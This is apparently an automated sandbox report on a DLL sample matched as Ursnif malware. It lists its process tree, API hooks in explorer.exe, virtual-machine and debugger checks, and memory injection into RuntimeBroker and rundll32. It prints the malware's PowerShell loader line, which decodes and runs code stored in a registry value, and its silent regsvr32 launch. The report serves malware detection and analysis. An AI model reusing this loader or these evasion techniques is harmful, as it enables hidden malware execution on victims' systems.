Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001B.00000002.320778651.00000207FAAD0000.00000002.00000001.sdmp, csc.exe, 0000001D.00000002.328226386.000001D639980000.00000002.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000021.00000000.352121542.0000000006560000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.340561415.00000000059E0000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\1rpmo52x\1rpmo52x.pdbXP source: powershell.exe, 00000019.00000002.393805123.000001D9A17A6000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\1rpmo52x\1rpmo52x.pdb source: powershell.exe, 00000019.00000002.393805123.000001D9A17A6000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: explorer.exe, 00000021.00000003.383204555.0000000007060000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.340561415.00000000059E0000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\ncwpagzn\ncwpagzn.pdb source: powershell.exe, 00000019.00000002.393805123.000001D9A17A6000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: explorer.exe, 00000021.00000003.383204555.0000000007060000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdb source: control.exe, 00000022.00000002.363644377.000001EFE2BAC000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdbGCTL source: control.exe, 00000022.00000002.363644377.000001EFE2BAC000.00000004.00000040.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\ncwpagzn\ncwpagzn.pdbXP source: powershell.exe, 00000019.00000002.393867902.000001D9A1813000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000021.00000000.352121542.0000000006560000.00000002.00000001.sdmp

Data Obfuscation:

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))

Compiles C# or VB.Net code

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1rpmo52x\1rpmo52x.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ncwpagzn\ncwpagzn.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1rpmo52x\1rpmo52x.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ncwpagzn\ncwpagzn.cmdline'

PE file contains an invalid checksum

Source: ncwpagzn.dll.29.dr	Static PE information: real checksum: 0x0 should be: 0x6cc4
Source: 1rpmo52x.dll.27.dr	Static PE information: real checksum: 0x0 should be: 0x2436
Source: 5fbce6bbc8cc4png.dll	Static PE information: real checksum: 0x27c27 should be: 0x2360d

Registers a DLL

Source: unknown

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\5fbce6bbc8cc4png.dll

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00DAACE0 push ecx; ret		1_2_00DAACE9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00DAB09B push ecx; ret		1_2_00DAB0AB

Persistence and Installation Behavior:

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\1rpmo52x\1rpmo52x.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\ncwpagzn\ncwpagzn.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.223302153.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.367530874.0000000000870000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.354944479.0000000003290000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.359558033.000001C73EF40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223173765.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223209468.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223261296.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223239089.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336440905.00000000008A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.479961254.000001FC13595000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223385631.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223396967.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.361030541.000001C73F145000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.360941487.0000000000C25000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.333669010.000001D9B67B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.223326462.0000000005138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.345685075.000001EFE0D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.280179571.0000000004F3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5348, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2344, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 5248, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5540, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3668, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFB70FF521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Source: explorer.exe

EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFB70FF5200

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\explorer.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Disables application error messsages (SetErrorMode)

Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines

Source: C:\Windows\System32\control.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3360
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5358

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6808

Thread sleep time: -13835058055282155s >= -30000s

Contains functionality to enumerate / list files inside a directory

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_00DA42B4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,

1_2_00DA42B4

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: explorer.exe, 00000021.00000002.488875864.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWal<
Source: explorer.exe, 00000021.00000000.356414497.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000021.00000000.356414497.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000021.00000000.355772452.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000021.00000000.356108629.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000021.00000003.377736019.000000000E535000.00000004.00000040.sdmp, 57BC.bin.33.dr	Binary or memory string: gencounter Microsoft Hyper-V Gene Kernel
Source: explorer.exe, 00000021.00000003.377736019.000000000E535000.00000004.00000040.sdmp, 57BC.bin.33.dr	Binary or memory string: vmgid Microsoft Hyper-V Gues Kernel
Source: explorer.exe, 00000021.00000003.377736019.000000000E535000.00000004.00000040.sdmp, 57BC.bin.33.dr	Binary or memory string: bttflt Microsoft Hyper-V VHDP Kernel
Source: explorer.exe, 00000021.00000000.350820161.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000021.00000003.377736019.000000000E535000.00000004.00000040.sdmp, 57BC.bin.33.dr	Binary or memory string: vpci Microsoft Hyper-V Virt Kernel
Source: explorer.exe, 00000021.00000000.356414497.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000021.00000000.356414497.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000021.00000000.356588522.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000021.00000002.488925530.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: RuntimeBroker.exe, 00000024.00000000.356640708.000001FC1125D000.00000004.00000001.sdmp	Binary or memory string: XInput_{6bd640a4-a5f3-4bd9-9f66-5a758203d37e}ft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000021.00000000.355772452.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000021.00000000.355772452.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000021.00000003.377736019.000000000E535000.00000004.00000040.sdmp, 57BC.bin.33.dr	Binary or memory string: storflt Microsoft Hyper-V Stor Kernel
Source: explorer.exe, 00000021.00000003.377736019.000000000E535000.00000004.00000040.sdmp, 57BC.bin.33.dr	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: explorer.exe, 00000021.00000000.355772452.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Queries a list of all running processes

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort			Jump to behavior

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1FC13800000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\System32\rundll32.exe base: 1C73EDD0000 protect: page execute and read and write

Changes memory attributes in foreign processes to executable or writable

Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute read
